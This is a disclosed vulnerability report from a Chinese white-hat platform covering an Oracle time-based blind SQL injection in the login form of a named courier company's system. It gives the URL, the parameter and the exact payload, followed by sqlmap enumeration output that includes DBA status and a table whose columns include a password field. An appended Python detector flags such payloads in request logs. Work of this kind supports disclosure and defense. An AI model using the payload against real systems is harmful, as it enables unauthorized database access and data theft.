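2014-12-18: Details reported to the vendor; awaiting vendor action
2014-12-18: Vendor confirmed; details disclosed to the vendor only
2014-12-28: Details disclosed to core white hats and relevant domain experts
2015-01-07: Details disclosed to regular white hats
2015-01-17: Details disclosed to trainee white hats
2015-02-01: Details disclosed to the public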
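SQL injection in an STO Express system, with DBA privileges

WooYun previously carried a vulnerability related to this system: WooYun: STO Express operations platform, login form injection and source code leak

POST injection point: http://bq.sto.cn/Login.aspx
Injected parameter: txtUsername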
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: txtUsername (POST)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: __VIEWSTATE=/wEPDwUKLTIxNTQ5Mzc5N2QYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCGJ0bkxvZ2luOuRt537R02BUqhHXVkPpFql7P+4=&txtUsername=sKwn' AND 2938=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(78)||CHR(109)||CHR(86),60) AND 'FOfy'='FOfy&btnLogin.x=1&btnLogin.y=1&txtPass=VZfZ
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Oracle
current user is DBA: True
available databases [19]:
[*] "CTXSYS\X11"
[*] "EXP\X11"
[*] "TSMS]S"
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] EXP_SYNC
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] STO
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TEST
[*] WMSYS
[*] XDB

The STO database contains 11 tables:

Database: STO
[11 tables]
+------------------------------------------------------------------+
| MLOG$_TAB_营掖\\?CD\\?F8\\?B5\\?E3\\?B1\\?ED |
| TAB_\\?B0\\?CD歉\\?C0\\?E0\\?D0\\?CD\\?B1\\?ED |
| TAB_\\?B8\\?B6\\?BF\\?EE\\?B7\\?BD式\\?B1\\?ED |
| TAB_\\?B9\\?AB司员\\?B9\\?A4\\?B1\\?ED |
| TAB_\\?BF\\?EC\\?BC\\?FE\\?C0\\?E0\\?D0\\?CD\\?B1\\?ED |
| TAB_\\?C1\\?F4\\?B2\\?D6\\?BC\\?FE原\\?D2\\?F2\\?B1\\?ED |
| TAB_\\?CE\\?CA\\?CC\\?E2\\?BC\\?FE\\?C0\\?E0\\?D0\\?CD |
| TAB_\\?CE\\?EF品\\?C0\\?E0\\?B1\\?F0\\?B1\\?ED |
| TAB_\\?D6\\?D0转\\?B2\\?BF\\?B7\\?A2\\?BC\\?FE路\\?D3\\?C9\\?B1\\?ED |
| TAB_目\\?B5\\?C4\\?B5\\?D8\\?B1\\?ED |
| TAB_营掖\\?CD\\?F8\\?B5\\?E3\\?B1\\?ED |
+------------------------------------------------------------------+
Picking one table at random:
Table: TAB_\\?CE\\?CA\\?CC\\?E2\\?BC\\?FE\\?C0\\?E0\\?D0\\?CD
[19 columns]
+--------------------------+-------------+
| Column                   | Type        |
+--------------------------+-------------+
| AUTHOR_NUM               | non-numeric |
| AVA_PROFESSOR            | non-numeric |
| C_DIARY_COMMENT_LOG_ID   | non-numeric |
| CANANYONEDISCOVERJID     | non-numeric |
| CARDNUMBER               | non-numeric |
| CT_ID                    | non-numeric |
| DELAY                    | non-numeric |
| HISTORY_ID               | non-numeric |
| ICONID                   | non-numeric |
| IDMEDICOFAMIGLIA         | non-numeric |
| IDSTELLE                 | non-numeric |
| NODE_ID                  | non-numeric |
| P_ASSWORD                | non-numeric |
| SECTION_VALUE            | non-numeric |
| SESSION_MEMBER_LOGIN_KEY | non-numeric |
| SKLEP2                   | non-numeric |
| TIDCLASFISCAIS           | non-numeric |
| TRIGGERTEMPLATEID        | non-numeric |
| VERSION_MIN              | non-numeric |
+--------------------------+-------------+
I did not go on to dump the other databases and tables...
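A defender-side check for the request shown in the sqlmap output above, as an added example that is not part of the original report: it scans form-encoded POST bodies for Oracle delay calls such as the DBMS_PIPE.RECEIVE_MESSAGE in the payload and correlates a hit with the response time. The log record layout, the response times, the placeholder __VIEWSTATE value and the function names are assumptions made for the illustration.

```python
import re
from urllib.parse import parse_qsl

# Oracle calls that can stall a query; the reported payload uses DBMS_PIPE.RECEIVE_MESSAGE.
DELAY_CALLS = re.compile(
    r"\bDBMS_(?:PIPE\s*\.\s*RECEIVE_MESSAGE|LOCK\s*\.\s*SLEEP)\s*\(", re.I)
# A quote followed by AND/OR: the string literal is closed and the predicate extended.
QUOTE_BREAK = re.compile(r"'\s*(?:AND|OR)\b", re.I)
# ASP.NET framework fields carry opaque base64, not user-typed input.
SKIP_FIELDS = {"__VIEWSTATE", "__EVENTVALIDATION"}

def scan_form_body(body):
    """Return [(field, reasons)] for form fields that look like Oracle time-based SQLi."""
    findings = []
    for field, value in parse_qsl(body, keep_blank_values=True):  # also URL-decodes
        if field in SKIP_FIELDS:
            continue
        reasons = [name for name, rx in (("oracle-delay-call", DELAY_CALLS),
                                         ("quote-break", QUOTE_BREAK)) if rx.search(value)]
        if reasons:
            findings.append((field, reasons))
    return findings

def triage(records, slow_seconds=30.0):
    """records: (path, body, response_seconds) tuples, a hypothetical log layout.
    A flagged request that was also slow suggests the delay ran inside the database."""
    alerts = []
    for path, body, seconds in records:
        for field, reasons in scan_form_body(body):
            alerts.append({"path": path, "field": field, "reasons": reasons,
                           "delay_observed": "oracle-delay-call" in reasons
                                             and seconds >= slow_seconds})
    return alerts

# Constructed sample records: the third body is the payload from the report,
# with a placeholder __VIEWSTATE; all response times are invented.
SAMPLE = [
    ("/Login.aspx", "__VIEWSTATE=AAAA&txtUsername=alice&txtPass=x&btnLogin.x=1", 0.2),
    ("/Login.aspx", "__VIEWSTATE=AAAA&txtUsername=O%27Brien&txtPass=x", 0.3),
    ("/Login.aspx", "__VIEWSTATE=AAAA&txtUsername=sKwn' AND 2938=DBMS_PIPE.RECEIVE_MESSAGE("
                    "CHR(82)||CHR(78)||CHR(109)||CHR(86),60) AND 'FOfy'='FOfy&txtPass=VZfZ", 60.4),
]

if __name__ == "__main__":
    for alert in triage(SAMPLE):
        print(alert)
```

Pattern matching on request bodies is a triage backstop; the underlying fix for a login query like this one is bind variables and a database account without DBA rights.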
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2014-12-18 17:26
Thank you
None yet